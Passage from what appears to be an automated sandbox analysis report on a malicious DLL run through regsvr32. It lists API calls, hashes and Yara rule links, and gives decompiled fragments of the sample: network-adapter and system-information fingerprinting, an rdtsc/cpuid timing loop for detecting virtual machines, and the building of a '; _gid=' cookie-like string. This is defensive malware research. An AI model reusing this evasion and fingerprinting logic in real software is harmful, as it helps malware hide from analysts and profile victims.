                                                                                                                                                                                                                  Function 002C10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 354099737-0
                                                                                                                                                                                                                  • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                  • Instruction ID: 09a27f729d496825dd2979a51cc2cd7064588783038db9622c519befb5149baf
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33C08C30120680C2F31D6B20E86EF2D2234AB41305F00071DC303456E08F3C54F8C343
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2118414088.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118409087.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118420512.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118435118.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118440758.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                  • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                  • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002C2C08, Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                                                                  			E002C2C08(void* __ecx, void* __edx, void* __edi, intOrPtr* __rax, long long __rbx, long long __rsi, long long __rbp, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _t22;
				int _t23;
				int _t24;
				void* _t30;
				void* _t36;
				intOrPtr* _t40;
				long long _t46;
				signed long long _t47;
				signed long long _t48;
				intOrPtr* _t68;
				long long _t70;

				_t40 = __rax;
				_t36 = __edi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t70 = __r8;
				GetProcessHeap();
				r8d = 0x2001;
				_t22 = RtlAllocateHeap(??, ??, ??); // executed
				_t68 = __rax;
				_t38 = __rax;
				if(__rax != 0) {
					r9d = __ecx;
					_t23 = wsprintfW(??, ??);
					r9d = __edx;
					_t24 = wsprintfW(??, ??);
					r9d = E002C2BD8(_t24, __rax, L"%s%u");
					_t46 = _t23 + _t24 + wsprintfW(??, ??);
					r9d = E002C1678(__rax, _t46, __r8);
					_t47 = _t46 + wsprintfW(??, ??);
					E002C1D18(__rax, _t47, __rax + _t47 * 2, _t70);
					_t48 = _t47 + __rax;
					_t30 = E002C1AC8(_t38, __rax, _t48, __rax + _t48 * 2, ":");
					_t49 = _t48 + __rax;
					E002C2A98(_t30, _t36, __rax, _t48 + __rax, __rax + (_t48 + __rax) * 2, _t70, _t70);
					_t22 = E002C27BC(_t49 + _t40, _t68 + (_t49 + _t40) * 2, _t70, ":");
				}
				return _t22;
			}














                                                                                                                                                                                                                  0x002c2c08
                                                                                                                                                                                                                  0x002c2c08
                                                                                                                                                                                                                  0x002c2c08
                                                                                                                                                                                                                  0x002c2c0d
                                                                                                                                                                                                                  0x002c2c12
                                                                                                                                                                                                                  0x002c2c1c
                                                                                                                                                                                                                  0x002c2c23
                                                                                                                                                                                                                  0x002c2c2e
                                                                                                                                                                                                                  0x002c2c37
                                                                                                                                                                                                                  0x002c2c3d
                                                                                                                                                                                                                  0x002c2c40
                                                                                                                                                                                                                  0x002c2c43
                                                                                                                                                                                                                  0x002c2c49
                                                                                                                                                                                                                  0x002c2c5d
                                                                                                                                                                                                                  0x002c2c66
                                                                                                                                                                                                                  0x002c2c7e
                                                                                                                                                                                                                  0x002c2c93
                                                                                                                                                                                                                  0x002c2ca9
                                                                                                                                                                                                                  0x002c2cb5
                                                                                                                                                                                                                  0x002c2ccb
                                                                                                                                                                                                                  0x002c2cd2
                                                                                                                                                                                                                  0x002c2cd7
                                                                                                                                                                                                                  0x002c2cde
                                                                                                                                                                                                                  0x002c2ce3
                                                                                                                                                                                                                  0x002c2ced
                                                                                                                                                                                                                  0x002c2cf9
                                                                                                                                                                                                                  0x002c2cfe
                                                                                                                                                                                                                  0x002c2d15

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,?,00000003,002C24A4), ref: 002C2C37
                                                                                                                                                                                                                    • Part of subcall function 002C1678: NtQuerySystemInformation.NTDLL(?,?,00000000,002C2CB1,?,?,00000003,002C24A4), ref: 002C16CB
                                                                                                                                                                                                                    • Part of subcall function 002C27BC: GetAdaptersInfo.IPHLPAPI(?,?,00000000,002C2CFE,?,?,00000003,002C24A4), ref: 002C280F
                                                                                                                                                                                                                    • Part of subcall function 002C27BC: GetAdaptersInfo.IPHLPAPI(?,?,00000000,002C2CFE,?,?,00000003,002C24A4), ref: 002C2845
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AdaptersInfo$AllocateHeapInformationQuerySystem
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1716770124-0
                                                                                                                                                                                                                  • Opcode ID: 551f92eabf4abe2fe4f6e692089831cc0b5c0ff75ee8c8a7613f42fc3d82b9ba
                                                                                                                                                                                                                  • Instruction ID: 5c0ee4ad2f91810003d1e5ec54c6e5dd1d67b201bda6b5a52f6df8a5fd842bf5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 551f92eabf4abe2fe4f6e692089831cc0b5c0ff75ee8c8a7613f42fc3d82b9ba
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86217A62790B4092EB14AF51F898BAD6360FB55B80F94412A9F0E47735EE28C569C700
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002C260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,002C1E13), ref: 002C264B
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                                                                                                  • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                  • Instruction ID: d16fe319d784caf016b40132b94d5379b3817bfe7acbb6eb9daab6d5a924320b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AE09222724541C2EF14EB20E8587DD3320FB84704F840226894E02664EF3CC65DCB00
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002C1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                  • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                  • Instruction ID: c8c2ec7bf337f5763895a1efe875278c2f5eb3f712c890800e55f1efbb6942b0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FD0A772E1024083F7349B10EA1BB9E2311F3D4315F804206C94944554CF3CC178C600
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                  Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2118414088.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118409087.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118420512.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118435118.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118440758.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %
                                                                                                                                                                                                                  • API String ID: 0-2567322570
                                                                                                                                                                                                                  • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                  • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2118414088.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118409087.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118420512.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118435118.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000003.00000002.2118440758.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                  • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002C1E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                                                                  			E002C1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                                  0x002c1e50
                                                                                                                                                                                                                  0x002c1e50
                                                                                                                                                                                                                  0x002c1e50
                                                                                                                                                                                                                  0x002c1e50
                                                                                                                                                                                                                  0x002c1e55
                                                                                                                                                                                                                  0x002c1e5a
                                                                                                                                                                                                                  0x002c1e5f
                                                                                                                                                                                                                  0x002c1e60
                                                                                                                                                                                                                  0x002c1e6b
                                                                                                                                                                                                                  0x002c1e6b
                                                                                                                                                                                                                  0x002c1e71
                                                                                                                                                                                                                  0x002c1e73
                                                                                                                                                                                                                  0x002c1e84
                                                                                                                                                                                                                  0x002c1e86
                                                                                                                                                                                                                  0x002c1e8a
                                                                                                                                                                                                                  0x002c1e8e
                                                                                                                                                                                                                  0x002c1e92
                                                                                                                                                                                                                  0x002c1e96
                                                                                                                                                                                                                  0x002c1e98
                                                                                                                                                                                                                  0x002c1e9f
                                                                                                                                                                                                                  0x002c1ea2
                                                                                                                                                                                                                  0x002c1ea5
                                                                                                                                                                                                                  0x002c1eab
                                                                                                                                                                                                                  0x002c1ead
                                                                                                                                                                                                                  0x002c1eb8
                                                                                                                                                                                                                  0x002c1eba
                                                                                                                                                                                                                  0x002c1ec1
                                                                                                                                                                                                                  0x002c1ec4
                                                                                                                                                                                                                  0x002c1ec7
                                                                                                                                                                                                                  0x002c1ec7
                                                                                                                                                                                                                  0x002c1ee9

                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000003.00000002.2112815067.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                  • Instruction ID: 06a67262e39bda4c467b313658b922d8b69e63eac95d2bbc794adbf285c42b3a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D01B172B24B908BDF249F36B60534AB6A2F38D7C0F148535EB9C43B19DA3CD4958B04
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 3068 Parent PID: 2632 regsvr32.exeCOMMON

                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                  Function 002027BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                                                                  			E002027BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E00202990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x2070c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E00202990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                  0x002027bc
                                                                                                                                                                                                                  0x002027bc
                                                                                                                                                                                                                  0x002027bc
                                                                                                                                                                                                                  0x002027bf
                                                                                                                                                                                                                  0x002027c3
                                                                                                                                                                                                                  0x002027c7
                                                                                                                                                                                                                  0x002027cb
                                                                                                                                                                                                                  0x002027d4
                                                                                                                                                                                                                  0x002027d7
                                                                                                                                                                                                                  0x002027e7
                                                                                                                                                                                                                  0x002027ea
                                                                                                                                                                                                                  0x002027fa
                                                                                                                                                                                                                  0x00202800
                                                                                                                                                                                                                  0x00202806
                                                                                                                                                                                                                  0x0020285f
                                                                                                                                                                                                                  0x0020285f
                                                                                                                                                                                                                  0x00202876
                                                                                                                                                                                                                  0x0020287b
                                                                                                                                                                                                                  0x00202893
                                                                                                                                                                                                                  0x00202893
                                                                                                                                                                                                                  0x0020280f
                                                                                                                                                                                                                  0x00202814
                                                                                                                                                                                                                  0x0020281f
                                                                                                                                                                                                                  0x0020282c
                                                                                                                                                                                                                  0x0020282c
                                                                                                                                                                                                                  0x0020282f
                                                                                                                                                                                                                  0x00202835
                                                                                                                                                                                                                  0x0020283b
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00202842
                                                                                                                                                                                                                  0x00202845
                                                                                                                                                                                                                  0x00202849
                                                                                                                                                                                                                  0x00202894
                                                                                                                                                                                                                  0x00202897
                                                                                                                                                                                                                  0x0020289e
                                                                                                                                                                                                                  0x002028a9
                                                                                                                                                                                                                  0x002028b5
                                                                                                                                                                                                                  0x002028b7
                                                                                                                                                                                                                  0x002028ba
                                                                                                                                                                                                                  0x002028c1
                                                                                                                                                                                                                  0x002028c8
                                                                                                                                                                                                                  0x002028cd
                                                                                                                                                                                                                  0x002028d0
                                                                                                                                                                                                                  0x002028d0
                                                                                                                                                                                                                  0x002028b5
                                                                                                                                                                                                                  0x002028d7
                                                                                                                                                                                                                  0x002028da
                                                                                                                                                                                                                  0x002028df
                                                                                                                                                                                                                  0x002028e8
                                                                                                                                                                                                                  0x002028ed
                                                                                                                                                                                                                  0x002028f6
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x002028fc
                                                                                                                                                                                                                  0x0020284b
                                                                                                                                                                                                                  0x00202854
                                                                                                                                                                                                                  0x00202859
                                                                                                                                                                                                                  0x00202859

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00202CFE,?,?,00000003,002024A4), ref: 0020280F
                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00202CFE,?,?,00000003,002024A4), ref: 00202845
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2122406529.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AdaptersInfo
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3177971545-0
                                                                                                                                                                                                                  • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                  • Instruction ID: 3c420371a1be33b9440f84438594a021f2b4e0197fa534e6068a36d5abcd18ee
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8319C65611B81D2EB19EF62E8087997762EB49F94F48C026CF0D17796EF38C54DC310
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00201810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2122406529.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                  • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                  • Instruction ID: 9efea63201c58450c94c988a18ba81fab029b61ac03d217f26770085c014dca7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9171F072321B8287EB24CF62E854BA977A1FB88B94F448125DF4A53F95DF38C5A5C700
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00201678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • NtQuerySystemInformation.NTDLL(?,?,00000000,00202CB1,?,?,00000003,002024A4), ref: 002016CB
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2122406529.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: InformationQuerySystem
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3562636166-0
                                                                                                                                                                                                                  • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                  • Instruction ID: c328992289bf991f6212d472623673a89c8f61bc8fd52abc1e412564811b72c4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF219565725B4183EF19EF52A848355A2A2FF85BC1F188034DF0A577A6EF3CC9658700
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 000007FEF8F91370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2124753507.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124747421.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124770251.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124779092.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124784872.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                  • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                  • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                  • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                  • Instruction ID: d58402523aa45de61867f6b8ded07bb346793c2564f4517cd5f4910259ccd42d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F451E1B251D6C48AE3A18B24E89479BBFA0F386358F145158E6CD4BBA9C37DC514CF44
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 000007FEF8F911B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2124753507.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124747421.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124770251.000007FEF8F95000.00000002.00020000.sdmp Download File
